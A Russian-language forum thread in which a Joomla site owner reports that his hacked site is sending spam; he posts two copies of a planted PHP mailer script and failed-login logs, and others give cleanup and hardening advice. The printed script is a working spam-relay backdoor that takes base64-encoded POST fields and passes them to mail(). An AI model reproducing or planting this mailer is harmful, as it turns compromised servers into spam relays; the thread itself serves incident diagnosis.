1. Приветствуем Вас на нашем закрытом форуме для складчиков сайта cmsheaven.org. Если Вы частный вебмастер, фрилансер, владелец малого или среднего бизнеса, представитель студии по разработке сайтов - будем рады видеть Вас в наших рядах экономных людей.
    Регистрация на форуме возможна только после вступления в складчину

Взломали сайт, идет email спам с домена, что делать?

Тема в разделе "Вопросы по шаблонам для Joomla [тех. поддержка]", создана пользователем Владислав, 16 апр 2015.

  1. Владислав

    Владислав Cкладчик

    Регистрация:
    29 мар 2015
    Сообщения:
    29
    Симпатии:
    1
    Добрый день!

    Есть сайт http://edinstvoyug.ru/

    Только распаковал шаблон фактически, а сегодня утром смотрю, а хостинг заблокировал Mail PHP...

    Доброго времени суток!

    Очередь удалена. Отправка почты скриптами с аккаунта отключена.
    Заблокировано
    /home/srv58311/edinstvoyug.ru/cli/
    /home/srv58311/edinstvoyug.ru/cli/in.php

    Учтите, что удаления недостаточно, вам нужно обновить CMS и модули, и следовать рекомендациям по безопасности в коммьюнити вашей CMS.
    После того как закроете уязвимость - напишите нам, включим поддержку почты.

    Что мне делать?
    Владислав, 16 апр 2015
    #1
  2. Gryzly

    Gryzly Матерый складчик

    Регистрация:
    27 окт 2014
    Сообщения:
    232
    Симпатии:
    26
    перейти на другой хостинг... :D
    Gryzly, 16 апр 2015
    #2
  3. Владислав

    Владислав Cкладчик

    Регистрация:
    29 мар 2015
    Сообщения:
    29
    Симпатии:
    1
    Разве проблема в хостинге, а не в шаблоне/Джумле?
    Владислав, 16 апр 2015
    #3
  4. modern.po

    modern.po Админ Команда форума

    Регистрация:
    25 авг 2014
    Сообщения:
    842
    Симпатии:
    497
    Добрый день!
    Шаблон чистый оригинальный джумлаартовский. Дело не в нем 100%.
    Есть ли какие-то сторонние расширения кроме этого шаблона?
    Может быть логи бы скинули посмотреть. Там все запросы к сайту отображаются.
    Вас либо через соседа взломали, либо через дырку в расширениях, либо через массовый брутфорс сайтов (логин admin?).
    Хостинг какой вообще? Есть соседи на одном IP?
    Последнее редактирование: 16 апр 2015
    modern.po, 16 апр 2015
    #4
    Modi34 и Владислав нравится это.
  5. Владислав

    Владислав Cкладчик

    Регистрация:
    29 мар 2015
    Сообщения:
    29
    Симпатии:
    1
    Есть ли какие-то сторонние расширения кроме этого шаблона?
    нет
    Может быть логи бы скинули посмотреть. Там все запросы к сайту отображаются.
    Как взять логи? Они в какой-то папке?
    (логин admin?).
    amin
    Хостинг какой вообще?
    HTS
    Есть соседи на одном IP?
    Да есть, причем на одном аккаунте 7 сайтов (тоже с шаблонов - полёт, т-т-т, нормальный)
    Владислав, 16 апр 2015
    #5
  6. Владислав

    Владислав Cкладчик

    Регистрация:
    29 мар 2015
    Сообщения:
    29
    Симпатии:
    1
    Появилось множество php файлов с таким содержанием:
    Код:
    <?php
if(isset($_POST["mailto"]))
  $MailTo = base64_decode($_POST["mailto"]);
else
   {
   echo "indata_error";
   exit;
   }
if(isset($_POST["msgheader"]))
  $MessageHeader = base64_decode($_POST["msgheader"]);
else
   {
   echo "indata_error";
   exit;
   }
if(isset($_POST["msgbody"]))
  $MessageBody = base64_decode($_POST["msgbody"]);
else
   {
   echo "indata_error";
   exit;
   }
if(isset($_POST["msgsubject"]))
  $MessageSubject = base64_decode($_POST["msgsubject"]);
else
   {
   echo "indata_error";
   exit;
   }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
   echo "sent_ok";
else
   echo "sent_error";
?>
    Последнее редактирование модератором: 16 апр 2015
    Владислав, 16 апр 2015
    #6
  7. Владислав

    Владислав Cкладчик

    Регистрация:
    29 мар 2015
    Сообщения:
    29
    Симпатии:
    1
    Код:
    error.php
2015-04-15T04:13:17+00:00   INFO 37.9.53.89   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-04-15T04:39:43+00:00   INFO 37.9.53.89   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-04-15T05:06:08+00:00   INFO 37.9.53.89   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-04-15T05:33:12+00:00   INFO 37.9.53.89   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-04-15T05:59:28+00:00   INFO 37.9.53.89   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
2015-04-15T06:28:53+00:00   INFO 37.9.53.89   joomlafailure   Имя пользователя и пароль не совпадают или у вас ещё нет учётной записи на сайте
    Это нормально?
    Так если они залогинились, они смогли загружать файлы php?
    Последнее редактирование модератором: 16 апр 2015
    Владислав, 16 апр 2015
    #7
  8. vet86

    vet86 Матерый складчик

    Регистрация:
    24 ноя 2014
    Сообщения:
    389
    Симпатии:
    78
    У меня такое было. Меняйте пароли, установите rsfirewall и проверьте файлы на хостинге. Удалите все зараженные и мониторьте. Если они появились опять то меняйте хостинг.
    vet86, 16 апр 2015
    #8
  9. Владислав

    Владислав Cкладчик

    Регистрация:
    29 мар 2015
    Сообщения:
    29
    Симпатии:
    1
    rsfirewall ругается на этот файл:
    includes/error.php Possible PHP injection (obfuscated code using /e modifier)
    А не, не было...
    еще найдено:
    Код:
    <?php
/*
Ничего страшного тут нет.
[3ran]
*/
if(isset($_POST["mailto"]))
  $MailTo = base64_decode($_POST["mailto"]);
else
   {
   echo "Valid";
   exit;
   }
if(isset($_POST["msgheader"]))
  $MessageHeader = base64_decode($_POST["msgheader"]);
else
   {
   echo "Valid";
   exit;
   }
if(isset($_POST["msgbody"]))
  $MessageBody = base64_decode($_POST["msgbody"]);
else
   {
   echo "Valid";
   exit;
   }
if(isset($_POST["msgsubject"]))
  $MessageSubject = base64_decode($_POST["msgsubject"]);
else
   {
   echo "Valid";
   exit;
   }
if(mail($MailTo,$MessageSubject,$MessageBody,$MessageHeader))
   echo "sent_ok";
else
   echo "sent_error";
?>
    Последнее редактирование модератором: 16 апр 2015
    Владислав, 16 апр 2015
    #9
  10. modern.po

    modern.po Админ Команда форума

    Регистрация:
    25 авг 2014
    Сообщения:
    842
    Симпатии:
    497
    Особенно понравился комментарий в коде от человека кто Вас взломал (или причастен к написанию софта) 3ran:
    Красава! :)
    Выяснить на 100% через что именно взломали ваш сайт по этим данным не представляется возможным.
    Скорее всего НЕ через брут админки, так как стандартный admin был изменен. А логи стандарты. Все наши сайты ежедневно брутятся автоматизированными программами и скриптами. Сделайте на всякий случай еще один административный пароль через rsfirewall
    То что других установленных расширений нету говорит о том что взлом был НЕ через уязвимости.
    Остается вариант взлома через соседей (или вообще всего хостинга, такое тоже бывает) либо через троян укравший пароли, например, от FTP с вашего компьютера.
    В любом случае настоятельно советую установить бекап сайта (до появления левого кода) на другой хостинг, сменить все пароли и установить скрипт мониторинга изменения файлов от monitorus.pro (сразу говорю сервис платный, но не дорогой). В случае если хоть один байт данных изменится в любом файле на хостинге - Вы сразу об этом узнаете.
    Ну и пароли везде старайтесь пожирнее делайте. От 20 рэндомных символов.
    Последнее редактирование: 16 апр 2015
    modern.po, 16 апр 2015
    #10
    Modi34 и zagigin84 нравится это.
  11. Modi34

    Modi34 Свой человек

    Регистрация:
    31 окт 2014
    Сообщения:
    2.033
    Симпатии:
    720
    Какой шаблон вы установили? Вы установили шаблон или квикстарт? Какая у вас версия joomla? Какие расширения установлены?

    дело в том что в старых версиях joomla и в старых расширениях есть дыры и если у вас что-то устарело и там была дыра то могли ей воспользоваться... так же могли быть проблемы с правами на файлы / папки... или что-либо еще без логов разобраться что конкретно произошло невозможно. Если у вас сложность в поиске логов советую обратиться в тех поддержку хостинга.
    Modi34, 16 апр 2015
    #11
    modern.po нравится это.
Язык
Russian (RU)